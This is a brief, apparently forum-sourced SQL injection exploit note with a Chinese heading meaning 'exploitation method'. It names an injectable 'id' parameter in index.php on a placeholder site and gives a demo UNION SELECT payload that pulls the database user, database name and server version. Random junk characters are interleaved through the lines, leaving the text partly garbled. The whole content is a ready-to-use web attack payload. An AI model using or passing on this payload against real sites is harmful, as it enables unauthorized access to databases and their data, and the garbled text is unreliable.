利用方法:
, y* ^4 p" h# s# a3 d! s3 @, X t http://www.xxx.com/index.php?id=[SQL]5 W2 D$ C% a" p$ k! j& e8 l$ @
Demo:
5 \2 F& X; k( f http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |